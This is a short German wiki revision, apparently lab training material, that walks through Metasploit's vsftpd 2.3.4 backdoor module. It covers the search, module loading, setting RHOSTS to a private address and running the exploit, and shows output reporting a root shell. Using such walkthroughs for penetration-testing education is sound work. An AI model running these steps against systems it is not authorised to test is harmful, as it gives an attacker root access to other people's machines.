Metasploit vsftp exploit: Unterschied zwischen den Versionen
Zur Navigation springen
Zur Suche springen
| (2 dazwischenliegende Versionen desselben Benutzers werden nicht angezeigt) | |||
| Zeile 1: | Zeile 1: | ||
=Gefundene Version= | =Gefundene Version= | ||
;<nowiki>[*] Nmap: 21/tcp open ftp vsftpd 2.3.4</nowiki> | ;<nowiki>[*] Nmap: 21/tcp open ftp vsftpd 2.3.4</nowiki> | ||
| + | =Gibt es eingebaute Schwachstellen zum vsftp Server?= | ||
| + | *msf6 > search vsftp | ||
| + | <pre> | ||
| + | Matching Modules | ||
| + | ================ | ||
| + | |||
| + | # Name Disclosure Date Rank Check Description | ||
| + | - ---- --------------- ---- ----- ----------- | ||
| + | 0 exploit/unix/ftp/vsftpd_234_backdoor 2011-07-03 excellent No VSFTPD v2.3.4 Backdoor Command Execution | ||
| + | |||
| + | |||
| + | Interact with a module by name or index. For example info 0, use 0 or use exploit/unix/ftp/vsftpd_234_backdoor | ||
| + | </pre> | ||
| + | =Module laden= | ||
| + | *msf6 > use 0 | ||
| + | =info= | ||
| + | *msf6 exploit(unix/ftp/vsftpd_234_backdoor) > info | ||
| + | =Wir müssen den RHOST setzen= | ||
| + | *msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set RHOSTS 10.0.10.105 | ||
| + | =Und Attacke= | ||
| + | *msf6 exploit(unix/ftp/vsftpd_234_backdoor) > run | ||
| + | <pre> | ||
| + | [*] 10.0.10.105:21 - Banner: 220 (vsFTPd 2.3.4) | ||
| + | [*] 10.0.10.105:21 - USER: 331 Please specify the password. | ||
| + | [+] 10.0.10.105:21 - Backdoor service has been spawned, handling... | ||
| + | [+] 10.0.10.105:21 - UID: uid=0(root) gid=0(root) | ||
| + | [*] Found shell. | ||
| + | </pre> | ||
| + | ;Wir haben kein Prompt aber eine Shell | ||
Aktuelle Version vom 19. Oktober 2022, 16:08 Uhr
Gefundene Version
- [*] Nmap: 21/tcp open ftp vsftpd 2.3.4
Gibt es eingebaute Schwachstellen zum vsftp Server?
- msf6 > search vsftp
Matching Modules ================ # Name Disclosure Date Rank Check Description - ---- --------------- ---- ----- ----------- 0 exploit/unix/ftp/vsftpd_234_backdoor 2011-07-03 excellent No VSFTPD v2.3.4 Backdoor Command Execution Interact with a module by name or index. For example info 0, use 0 or use exploit/unix/ftp/vsftpd_234_backdoor
Module laden
- msf6 > use 0
info
- msf6 exploit(unix/ftp/vsftpd_234_backdoor) > info
Wir müssen den RHOST setzen
- msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set RHOSTS 10.0.10.105
Und Attacke
- msf6 exploit(unix/ftp/vsftpd_234_backdoor) > run
[*] 10.0.10.105:21 - Banner: 220 (vsFTPd 2.3.4) [*] 10.0.10.105:21 - USER: 331 Please specify the password. [+] 10.0.10.105:21 - Backdoor service has been spawned, handling... [+] 10.0.10.105:21 - UID: uid=0(root) gid=0(root) [*] Found shell.
- Wir haben kein Prompt aber eine Shell